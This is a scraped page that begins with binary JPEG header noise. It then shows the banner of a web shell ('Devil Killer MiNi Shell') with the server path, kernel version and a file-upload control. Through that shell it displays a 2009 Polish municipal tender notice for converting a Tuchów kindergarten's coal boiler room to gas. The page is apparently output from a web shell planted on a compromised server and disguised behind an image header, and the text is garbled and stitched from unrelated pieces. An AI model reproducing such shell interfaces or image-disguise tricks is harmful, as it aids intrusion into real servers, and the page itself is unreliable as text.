JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090702/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090702/103917-N-2009.html

<p class="kh_header"><b>Tuchów: Termomodernizacją  budynku  Przedszkola  Publicznego w  Tuchowie  ETAP II - modernizacja  kotłowni  węglowej  na  gazową  wraz  z  wymianą  wewnętrznej  instalacji  c.o.</b><br>
<b>Numer ogłoszenia: 103917 - 2009; data zamieszczenia: 02.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Tuchów , ul. Rynek 1, 33-170 Tuchów, woj. małopolskie, tel. 0146525218 w. 12.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.tuchow.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> Nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Termomodernizacją  budynku  Przedszkola  Publicznego w  Tuchowie  ETAP II - modernizacja  kotłowni  węglowej  na  gazową  wraz  z  wymianą  wewnętrznej  instalacji  c.o..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot  wykonania  obejmuje  roboty  remontowo - budowlane  związane  z  wykonaniem  kotłowni  gazowej wraz  z   wymianą   wewnętrznej  instalacji  c.o. Przedszkola  Publicznego  w  Tuchowie  w  zakresie

- roboty  demontażowe /demontaż  starych  urządzeń  grzewczych  w  kotłowni/
- demontaż  istniejącej  wyeksploatowanej  instalacji  centralnego  ogrzewania
- roboty  remontowo - budowlane  wewnątrz  kotłowni  w  tym  remont  ścian  i  posadzek, wymiana  wewnętrznej  instalacji  wod - kan, instalacji  elektrycznej  i  wentylacyjnej, 
- wykonanie  nowej  instalacji  centralnego  ogrzewania  na  całości  budynku
- wykonanie  nowej  wewnętrznej  instalacji  gazowej  do  kotłowni   i  lokalu  użytkowego
- montaż  urządzeń  i  osprzętu  grzewczego.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.21.41.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wadium w wysokości  5 000,00 zł powinno być wniesione w terminie do  dnia  24.07.2009 r. do  godz. 10.00  Nie  wniesienie wadium w wymaganym terminie spowoduje odrzucenie oferty, zgodnie z Prawem zamówień publicznych.
Wadium wnoszone w pieniądzu powinno zostać przelane lub wpłacone na rachunek zamawiającego w banku:
Bank  Spółdzielczy  w  Bieczu  - Filia  Tuchów  Nr  75  8627  0001  2023  9000  2645  0004  z  adnotacją: Wadium -  nr sprawy:  [ZP-A-341-19/09].

1a. Wadium może być wniesione w jednej z następujących form:

1.w pieniądzu
2.poręczeniach lub w poręczeniach  bankowych  lub  poręczeniach  spółdzielczej  kasy  oszczędnościowo - kredytowej,   z tym  że  zobowiązanie  kasy  jest  zawsze  poręczeniem  pieniężnym
3.gwarancjach bankowych
4.w gwarancjach ubezpieczeniowych
5.poręczeniach udzielanych przez podmioty, o których mowa w art. 6b  ust  5 pkt. 2 ustawy z dnia 9 listopada 2000 o  utworzeniu PARP (Dz. U z 2007 r  Nr 42 poz. 275)

Wykonawcy  którzy  zamierzają  wnieść  wadium  w  formie  innej  niż  pieniądz  powinni  złożyć  oryginał  dokumentu  potwierdzający  wniesienie  wadium  w  pokoju   nr  1  przed  terminem  składania  ofert

Wadium  wnieść  można  w każdej  formie  wymienionej  w  pkt. 1.1a, 1 z  tym, że  dowód - kopię  potwierdzoną za  zgodność  z  oryginałem  należy  umieścić  wewnątrz  oferty.
	
2. Zasady zwrotu wadium
Wadium wniesione w pieniądzu Zamawiający zwróci, zgodnie z art. 46 ust. 4, wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez  Wykonawcę.

Zgodnie z art. 46 ust. 1 ustawy, wadium zostanie zwrócone niezwłocznie, jeżeli:

1)upłyną ł termin związania z  ofertą,
2)zawarto umowę w sprawie zamówienia publicznego i wniesiono zabezpieczenie należytego wykonania tej umowy
3)Zamawiający unieważnił  postępowanie o udzielenie zamówienia, a  protesty  zostały  ostatecznie rozstrzygnięte lub  upłynął  termin  do  ich  wnoszenia.

Zgodnie z art. 46 ust. 2 ustawy, wadium zostanie zwrócone niezwłocznie po złożeniu pisemnego wniosku przez  wykonawcę:

1)który wycofał ofertę przed upływem terminu składania ofert,
2)którego oferta została odrzucona, 
3)który został wykluczony z postępowania

3. Utrata wadium

Zgodnie z art. 46 ust. 4a  i  5  ustawy  Prawo zamówień publicznych, wykonawca, którego oferta zostanie wybrana, traci wadium na rzecz Zamawiającego, w przypadku gdy:

1)nie  wniósł wymaganego  zabezpieczenia należytego wykonania umowy
2)odmówił  podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
3)zawarcie umowy w sprawie zamówienia publicznego  stało  się niemożliwe  z przyczyn  leżących po stronie wykonawcy.
Ponadto  zamawiający  zatrzymuje  wadium  wraz  z  odsetkami, jeżeli  wykonawca  w  odpowiedzi  na  wezwanie, o  którym  mowa  w  art. 26  ust. 3, nie  złożył  dokumentów  lub  oświadczeń  potwierdzających  spełnienie  warunków  udziału w  postępowaniu, o  których  mowa w  art. 25  ust. 1, lub  pełnomocnictw  chyba, że  udowodni  , że  wynika  to  z  przyczyn  nie  leżących  po  jego  stronie.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Ocena  spełnienia  warunków  wymaganych  od  wykonawców  zostanie  dokonana  w  oparciu o  następujące  kryteria:  

O udzielenie zamówienia mogą ubiegać się  wykonawcy, którzy:

A. Posiadają uprawnienia niezbędne do wykonania zamówienia, jeżeli  ustawy  nakładają  obowiązek  posiadania  takich  uprawnień. 

Przedmiotowy warunek zostanie uznany za spełniony, jeżeli wykonawca  udokumentuje uprawnienia do występowania w obrocie prawnym.

Ocena  tego warunku będzie dokonana  na  podstawie:

- aktualnego  odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 m - cy  przed upływem terminu składania ofert.
W  przypadku  występowania  pełnomocnika  należy  dołączyć  pełnomocnictwo  dla osób  podpisujących  ofertę  do podejmowania  zobowiązań  w  imieniu  firmy składającej  ofertę, o  ile  nie  wynikają  z  przepisów  prawa lub innych  dokumentów
- aktualnej  informacji  z  Krajowego  Rejestru  Karnego  w  zakresie  określonym  w  art. 24  ust. 1  pkt. 4-8  ustawy, wystawionej  nie  wcześniej  niż  6  miesięcy  przed  upływem  terminu  składania  ofert
- aktualnej  informacji  z  Krajowego  Rejestru  Karnego  w  zakresie  określonym  w  art. 24  ust. 1  pkt. 9  ustawy, wystawionej  nie  wcześniej  niż  6  miesięcy  przed  upływem  terminu  składania  ofert
- aktualnego  zaświadczenia  właściwego  naczelnika  urzędu  skarbowego  oraz  właściwego  oddziału  Zakładu Ubezpieczeń  Społecznych  lub  Kasy  Rolniczego  ubezpieczenia  Społecznego  potwierdzających  odpowiednio,   że wykonawca  nie  zalega  z  opłacaniem  podatków, opłat  oraz  składek  na  ubezpieczenie  zdrowotne  i  społeczne, lub  zaświadczeń, że  uzyskał  przewidziane  prawem  zwolnienie, odroczenie  lub  rozłożenie  na  raty  zaległych płatności  lub  wstrzymanie  w  całości  wykonania  decyzji  właściwego  organu - wystawionych  nie  wcześniej niż  3  miesiące  przed  upływem  terminu  składania  ofert

B. Posiadają niezbędną wiedzę i doświadczenie  oraz  dysponują  potencjałem  technicznym  i  osobami  zdolnymi  do  wykonania  zamówienia, lub  przedstawią  pisemne  zobowiązanie  innych  podmiotów  do  udostępnienia  potencjału  technicznego  i  osób  zdolnych  do  wykonania  zamówienia. 

a/ w  zakresie  wymaganego  doświadczenia - Zamawiający  wymaga, aby  wykonawca  wykazał  się  co  najmniej  2  robotami   budowlanymi   /jako  generalny  wykonawca/  wykonywanymi  w  budynkach  użyteczności  publicznej, zamieszkania  zbiorowego,   budynkach  mieszkalnych  wielorodzinnych  lub  jednorodzinnych  polegającymi  na   budowie, przebudowie  lub  remoncie   kotłowni  gazowej   wraz  z  instalacją  centralnego  ogrzewania o  wartości   co  najmniej  150  000  PLN  każda 

Ocena  tego warunku będzie dokonana  na  podstawie:
- wykazu  zrealizowanych   zamówień  publicznych  wykonanych  przez  wykonawcę  w  okresie  ostatnich  5  lat przed  dniem  wszczęcia postępowania  o udzielenie  zamówienia  /ogłoszenie  w  BZP/, a  jeżeli  okres  prowadzenia działalności  jest krótszy - w tym  okresie, popartych  odpowiednimi  dokumentami, /referencje, protokoły  odbioru końcowego, opinie zamawiających, dla  których zamówienia  zostały  zrealizowane/  iż  przedstawione  roboty budowlane  zostały wykonane  należycie. 

Do  każdej  pozycji  wyszczególnionej  w  załączniku  nr  3   SIWZ  należy  załączyć  dokument  potwierdzający  należyte  wykonanie  zamówienia. 
Z  przedłożonego  dokumentu  jednoznacznie  ma  wynikać, że  wykonawca  wykonał, przebudował lub  wyremontował  kotłownie  gazową   wraz  z  instalacją  centralnego  ogrzewania  o  wartości   co  najmniej 150  000  PLN  każda

b/  w  zakresie   dysponowania   osobami  zdolnymi   do  wykonania  zamówienia.- Zamawiający  wymaga, aby  wykonawca  dysponował :
- kierownikiem  budowy  posiadającym  uprawnienia  budowlane  w  specjalności  instalacyjnej  w  zakresie   instalacji  i  urządzeń  cieplnych  i  gazowych  z  min. 10  letnim  doświadczeniem zawodowym  jako  kierownik  budowy,  w  tym  doświadczenie  zawodowe  w  zakresie  kierowania budową, przebudową  lub  remontem 2  kotłowni  gazowych   o  mocy  min  50  kW
- posiadania  lub  dysponowania  odpowiednią  ilością  osób  /pracowników  fizycznych/ zdolnych do  wykonania zamówienia  w  ilości  nie mniejszej  niż  15

Ocena tego warunku będzie dokonana w oparciu o:

- uprawnienia  budowlane  kierownika budowy  do  wykonywania  samodzielnych  funkcji  technicznych w  budownictwie w  specjalności  instalacyjnej  w  zakresie   instalacji  i  urządzeń  cieplnych  i  gazowych,  wraz z aktualnym zaświadczeniem   o przynależności  do właściwej Izby Inżynierów Budownictwa. 
- sporządzenia  wykazu  osób - podania  personelu  technicznego  który  będzie  wykonywać  zamówienie  lub  będzie uczestniczyć  w  wykonywaniu  zamówienia, wraz  z  informacjami  na  temat  ich  kwalifikacji  niezbędnych  do wykonania  zamówienia, a  także  wykonywanych  przez  nich  czynności. - załącznik  nr  4  SIWZ

C/ Znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia 

W  zakresie  wymaganej  sytuacji  ekonomicznej  i  finansowej  - Zamawiający  wymaga, aby  wykonawca :

- był  ubezpieczony  od  odpowiedzialności  cywilnej  w  zakresie  prowadzonej  działalności  gospodarczej  na  kwotę nie mniejszą  niż  200 000  PLN

Ocena tego warunku zostanie dokonania w oparciu o:

- polisę  lub  inny  dokument  ubezpieczenia  potwierdzający, że  wykonawca  jest  ubezpieczony od odpowiedzialności  cywilnej  w  zakresie  prowadzonej  działalności  gospodarczej,  

D/  Nie podlega wykluczeniu z postępowania na podstawie art. 24  ust. UPzp

Ocena tego warunku zostanie dokonania w oparciu o:

- wykaz  oświadczeń  zawartych  w  dokumencie  o nazwie Oświadczenie /załącznik nr 2 SIWZ/ złożonych w trybie art. 22  ustawy.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wykaz  oświadczeń jakie  mają  dostarczyć  wykonawcy  w  celu  potwierdzenia  spełnienia  warunków  udziału  w  postępowaniu:

Każdy  Wykonawca  przystępujący do przetargu  winien złożyć oświadczenie, że:

- posiada  uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;

- posiada  niezbędną wiedzę i doświadczenie oraz dysponują  potencjałem technicznym  i  osobami zdolnymi do wy­konania zamówienia, lub  przedstawią  pisemne  zobowiązanie  innych  podmiotów  do  udostępnienia  potencjału  technicznego  i  osób  zdolnych  do  wykonania  zamówienia;

- znajduję się  w sytuacji ekonomicznej i finansowej za­pewniającej wykonanie zamówienia;

- nie podlega  wykluczeniu z postępowania o udzielenie zamówienia  na  podstawie  art. 24  ust. 1 i 2  uPzp.

Ponadto  Zamawiający  żąda  złożenia  oświadczenia, że  wykonawca:

- zapoznał  się  z  terenem  budowy  i że  nie  wnosi   żadnych  uwag

- w przypadku wyboru  oferty  podpisze  umowę, której  projekt  załączono do specyfikacji istotnych warunków zamówienia w terminie i czasie wskazanym przez Zamawiającego

- realizując  zamówienie  publiczne  w  ciągu  ostatnich  3  lat  przed  wszczęciem  postępowania  nie wyrządziliśmy szkody, nie  wykonując  zamówienia  lub  wykonując  je  z  nienależytą  starannością

- oferowane  materiały, urządzenia  spełniają  wszystkie warunki zamówienia, a w szczególności posiadają wszystkie  wymagane atesty  i  certyfikaty

- udzieli  co  najmniej  5   letniej  gwarancji  na  wykonane  prace  budowlane  

- roboty  budowlane  zostaną  wykonane  zgodnie  z  należytą  starannością, zgodnie  z normami  technicznymi, standardami, zasadami  sztuki  budowlanej, wiedzą  techniczną, a  w  szczególności  z obowiązującymi przepisami prawa w  tym  zakresie,  dokumentacją  projektowo - techniczną, etyką  zawodową     przepisami  BHP  i  postanowieniami umowy.

- wszyscy  pracownicy  skierowani  do  realizacji  zamówienia  będą  posiadać  wymagane  kwalifikacje  techniczne  i  aktualne  badania  lekarskie

- po zapoznaniu się z wszystkimi warunkami zamówienia, projektem umowy i załącznikami  akceptują je bez zastrzeżeń

Wykaz  dokumentów jakie  mają  dostarczyć  wykonawcy  w  celu  potwierdzenia  spełnienia  warunków  udziału  w  postępowaniu:

Od wykonawców ubiegających się o przyznanie zamówienia wymagane jest,  w celu potwierdzenia spełnienia warunków,  o których mowa w art. 22 ust. 2 ustawy, przedstawienie wymienionych niżej dokumentów. 
Dokumenty te, zgodnie  z obowiązującym w tym zakresie Rozporządzeniem Prezesa  Rady  Ministrów   z dnia 19  maja 2006 r. /Dz. U. z  16  października  2008 r. Nr 188, poz. 1155./, winny  być  aktualne  w  terminie  składania  ofert   i   mogą być przedstawione w formie  oryginałów  lub  poświadczonych  kopii  Za  zgodność  z  oryginałem. 
Potwierdzenie zgodności należy dokonać na każdej stronie dokumentu.

W celu potwierdzenia spełnienia warunków udziału w postępowaniu oferta musi zawierać następujące oświadczenia i dokumenty :

- wykaz oświadczeń, że wykonawca spełnia warunki udziału w postępowaniu określone w art. 22 ust. 1  i  że nie podlega wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2 uPzp - zgodnych z treścią  załącznika  nr 2 SIWZ .

- aktualnego  odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 m - cy  przed upływem terminu składania ofert.

- aktualnej  informacji  z  Krajowego  Rejestru  Karnego  w  zakresie  określonym  w  art. 24  ust. 1  pkt. 4-8  ustawy, wystawionej  nie  wcześniej  niż  6  miesięcy  przed  upływem  terminu  składania  ofert

- aktualnej  informacji  z  Krajowego  Rejestru  Karnego  w  zakresie  określonym  w  art. 24  ust. 1  pkt. 9  ustawy, wystawionej  nie  wcześniej  niż  6  miesięcy  przed  upływem  terminu  składania  ofert

W  przypadku  wnoszenia  wspólnej  oferty  przez  wykonawców wspólnie ubiegających się o udzielenie zamówienia, należy  dołączyć  oświadczenie  Wykonawców, że  ich  zobowiązania  co  do  wykonania  zamówienia  są   solidarne  a  także:  oświadczenia  i  dokumenty  potwierdzające  spełnienie  warunków  o  których  mowa    w  pkt. 19  i  20  SIWZ 

Każdy  z  wykonawców  wspólnie  ubiegających  się  o  udzielenie  zamówienia  składa  dokumenty  tak  jakby  sam  ubiegał  się  o  udzielenie  zamówienia  publicznego.

W  zakresie  dokumentów  potwierdzających  spełnienie  warunków  w  zakresie  wymaganego  doświadczenia i  potencjału  ludzkiego  oraz  zdolności  finansowej, Zamawiający  dopuszcza  możliwość  sumowania  potencjałów  wszystkich  wykonawców  wspólnie  ubiegających  się  o  zamówienie.

Ponadto w  przypadku  Wykonawców   wspólnie  ubiegających się  o zamówienie, wykonawcy  ustanawiają  pełnomocnika  do  reprezentowania  ich  w  postępowaniu  o  udzielenie  zamówienia  albo  reprezentowania    ich  w  postępowaniu i  zawarcia  umowy  w sprawie  zamówienia  publicznego.

W przypadku podpisywania oferty lub poświadczenia za zgodność z oryginałem kopii dokumentów przez osobę/y nie  wymienione w dokumencie rejestracyjnym wykonawcy, należy do oferty dołączyć stosowne  pełnomocnictwo. 
Pełnomocnictwo powinno być przedłożone w formie oryginału  lub  notarialnie  potwierdzonej  kopii. 

Zamawiający przypomina, że dokument pełnomocnictwa , jak i jego odpis  zgodnie z przepisami ustawy z dnia 9 września 2000 o opłacie skarbowej podlegają opłacie skarbowej. 

Opłata skarbowa powinna być odprowadzona zgodnie z Rozporządzeniem Ministra Finansów z dnia 5 grudnia 2000 r.  w sprawie pobierania zapłaty i zwrotu opłaty skarbowej oraz sposobu prowadzenia rejestrów tej opłaty .

Jeżeli  oferta  wykonawców  o  których  mowa  w  art. 23  ust. 1  uPzp  zostanie  wybrana, zamawiający  przed  podpisaniem  umowy  w  sprawie  zamówienia  publicznego  zażąda  przedstawienia  umowy  regulującej   współpracę  podmiotów  występujących  wspólnie.    

- aktualnych  zaświadczeń  właściwego  naczelnika  urzędu  skarbowego  oraz  właściwego  oddziału  Zakładu Ubezpieczeń  Społecznych  lub  Kasy  Rolniczego  ubezpieczenia  Społecznego  potwierdzających  odpowiednio, że wykonawca  nie  zalega  z  opłacaniem  podatków, opłat  oraz  składek  na  ubezpieczenie  zdrowotne  i  społeczne, lub zaświadczeń, że  uzyskał  przewidziane  prawem  zwolnienie, odroczenie  lub  rozłożenie  na  raty  zaległych  płatności lub  wstrzymanie  w  całości  wykonania  decyzji  właściwego  organu - wystawionych  nie  wcześniej  niż  3 miesiące przed  upływem  terminu  składania  ofert

- dokumentów stwierdzających, że  osoby  które  wykonywać  będą  zamówienie  posiadają  wymagane  uprawnienia, jeżeli  ustawy  nakładają  obowiązek  posiadania  takich  uprawnień.                                                                                 
Należy  podać  wykaz  pracowników  nadzoru,  zawierający  potwierdzenie  wymaganych  kwalifikacji   i doświadczenia w  wykonywaniu  zamówień  jak  w  niniejszym  postępowaniu  załączyć  uprawnienia  budowlane  wraz  z   aktualnym  zaświadczeniem  o   przynależności  kierownika  budowy   do  właściwej  Izby  Inżynierów  Budownictwa

- wykazu  wykonanych   robót  budowlanych,  w okresie  ostatnich  pięciu  lat przed  dniem  wszczęcia  postępowania o  udzielenie  zamówienia, a  jeżeli  okres  prowadzenia  działalności  jest  krótszy - w  tym  okresie, odpowiadających  swoim  rodzajem   i  wartością  robotom  budowlanym  stanowiącym  przedmiot  zamówienia z  podaniem  ich  wartości  oraz  daty  i  miejsca  wykonania,  przed  dniem  wszczęcia postępowania  o  udzielenie  zamówienia  /ogłoszenie w  BZP/, a  jeżeli  okres  prowadzenia  działalności  jest krótszy - w tym  okresie,

- dokumentów  potwierdzających,  że roboty  budowlane, przedstawione w  powyższym  w wykazie, zostały wykonane z należytą starannością,

- wykazu  osób, którymi  dysponuje  lub  będzie  dysponował  wykonawca  i  które  będą  uczestniczyć  w  wykonywaniu zamówienia, wraz  z  informacjami  na  temat  ich  kwalifikacji  zawodowych, doświadczenia  i  wykształcenia niezbędnych  do  wykonywania  zamówienia, a  także  zakresu  wykonywanych  prze  nie  czynności

- pisemnego  zobowiązania  innych  podmiotów  do  udostępnienia  osób  zdolnych  do  wykonania  zamówienia  innych podmiotów,  jeżeli  w  sporządzonym  wykazie  na  załączniku  do  SIWZ   wykonawca  wskazał  osoby, którymi będzie  dysponował

- wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń, jakimi dysponuje Wykonawca, lub  będzie  dysponował  wykonawca, rodzaj  narzędzi urządzeń  i  sprzętu, rok  budowy, parametry  techniczne, ilość  sztuk, stan  własności    

- pisemnego  zobowiązania  innych  podmiotów  do  udostępnienia  niezbędnych  do  wykonania  zamówienia  narzędzi  i  urządzeń , jeżeli  w  sporządzonym  wykazie  na  załączniku  do  SIWZ , wykonawca  wskazał  narzędzia    i urządzenia, którymi  będzie  dysponował

- wskazania  przez  wykonawcę  w  załączniku  nr  6 SIWZ  tej  części  zamówienia, która  zostanie  powierzona podwykonawcom           
Zamawiający  żąda  przedstawienia   w  swojej  ofercie  i  zakresu  powierzonych  prac  podwykonawcom  w  przypadku  ich  występowania.

- polisy  lub  innego  dokumentu  ubezpieczenia  potwierdzającego, że  wykonawca  jest  ubezpieczony od odpowiedzialności  cywilnej  w  zakresie  prowadzonej  działalności  gospodarczej  

Załączniki  do  formularza  ofertowego, będące  częścią  oferty, muszą  być  podpisane  bądź  przez  ww. osoby,  bądź  przez  upoważnionego  Wykonawcę, w  tym  przypadku  upoważnienie  do  podpisania  dokumentów  musi  być  bezwzględnie  dołączone  do  oferty.

Brak  jakichkolwiek z  wyżej  wymienionych  dokumentów, lub  złożenie  dokumentu  w  niewłaściwej  formie  np.  nie  poświadczenie którejkolwiek  strony  dokumentu  przez  wykonawcę  za  zgodność  z  oryginałem,    odpisy  lub  kopie, stwierdzenia  braku  podpisów  bądź  upoważnienia  do  podpisywania  dokumentów, Wykonawca  zostanie  wykluczony i  spowoduje  odrzucenie  oferty.

Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa powyżej składa dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:

1.nie otwarto jego likwidacji ani nie ogłoszono upadłości - dokument  wystawiony  nie  wcześniej    niż  6  m-cy  przed upływem  terminu  składania  ofert
2.nie orzeczono wobec niego zakazu ubiegania się o zamówienie - dokument  wystawiony  nie  wcześniej  niż   6  m-cy  przed  upływem  terminu  składania  ofert
3.nie zalega z uiszczeniem podatków, opłat,  składek na ubezpieczenie społeczne lub zdrowotne albo uzyskał przewidziane prawem zwolnienie, odroczenia lub rozłożenia na raty zaległych płatności lub wstrzymania w całości wykonania decyzji właściwego organu.- dokument  wystawiony  nie  wcześniej   niż  3  m-ce  przed upływem  terminu  składania  ofert  

